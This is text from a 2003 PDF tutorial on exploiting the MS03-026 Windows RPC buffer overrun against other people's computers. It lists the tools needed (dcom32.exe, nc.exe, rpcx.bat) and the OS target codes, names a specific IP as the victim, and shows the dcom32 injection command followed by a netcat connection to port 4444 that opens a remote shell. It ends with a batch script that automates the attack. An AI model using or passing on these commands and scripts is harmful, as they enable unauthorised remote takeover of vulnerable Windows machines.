Windows Rpc Hacking Exploit.pdf

The Microsoft Windows NT4/2000/XP/2003

RPC Buffer Overrun Exploit (MS03-026)

Pol Balaguer

August 2003

Manila, Philippines

The Microsoft Windows NT4/2000/XP/2003

RPC Buffer Overrun Exploit (MS03-026)

This is my first time to use this exploit, it’s just a week ago (July 16, 2003) that Microsoft

announce this flaw in their operating systems. After that source code and exploit tools was

released, all these are being scattered to the Internet.

By the way, these are the files we need:

•

dcom32.exe

nc.exe

rpcx.bat (released as rcpx.bat in internet just rename it)

These are the few basic files we need for the exploit the other files are downloadable to

http://illmob.org/rpc or you can check the included media disk on this tutorial.

So for a start… you need an IP Scanner and the same time a Port Scanner. Got this one program

from www.webattack.com the Angry IP Scanner this is one good ip and port scanner.

We have a target IP which is 202.81.181.34 the IP Scanner uses color coding which is,

red = dead host, blue = alive host but no open port, green = alive and port is open.

Executing dcom32.exe needs a parameter to choose the operating system of your victim’s box.

Options on dcom32.exe:

0 Windows 2000 SP0 (english)

1 Windows 2000 SP1 (english)

2 Windows 2000 SP2 (english)

3 Windows 2000 SP3 (english)

4 Windows 2000 SP4 (english)

5 Windows XP SP0 (english)

6 Windows XP SP1 (english)

This is a customized program; some program distribution includes the NT4, Chinese, Polish and

other international version of Windows.

Syntax:

dcom32 <os code> <victims ip>

nc <victims ip> 4444

4444 is the standard port to connect to the victim’s computer.

Since, I already got the IP with an open port it’s time to have a shell so at this part I do it manually

and didn’t use the rpcx.bat (batch file) for the mean time… we will be using it later…

Take a look at the picture above; I already issued the dcom32 to inject code to the RPC port of

the remote computer, expecting my victim’s box using a Windows XP with Service Pack 0 (sp0).

If you failed, try using other options like “6” with sp1 installed.

Use Netcat to connect to 202.81.181.34:4444

Injection was successful…

nc 202.81.181.34 4444

Now, lets use the netcat or nc to give us a shell

Boom! It spawns me to the shell…

Note: If you failed connecting use the 5 and 6 option you can try also the Windows 2000 option from

0 to 4, for me I just started using 5 as it the most common operating system used by regular

users.

Here is the version of the rpcx.bat…. as it passes the values to the command and it will be

executed by batch.

@echo on

@echo - 0 Windo:ws 2000 SP0 (english)

@echo - 1 Windows 2000 SP1 (english)

@echo - 2 Windows 2000 SP2 (english)

@echo - 3 Windows 2000 SP3 (english)

@echo - 4 Windows 2000 SP4 (english)

@echo - 5 Windows XP SP0 (english)

@echo - 6 Windows XP SP1 (english)

dcom32 %1 %2

nc -vvv %2 4444

Plik z chomika:

Inne pliki z tego folderu:

Inne foldery tego chomika: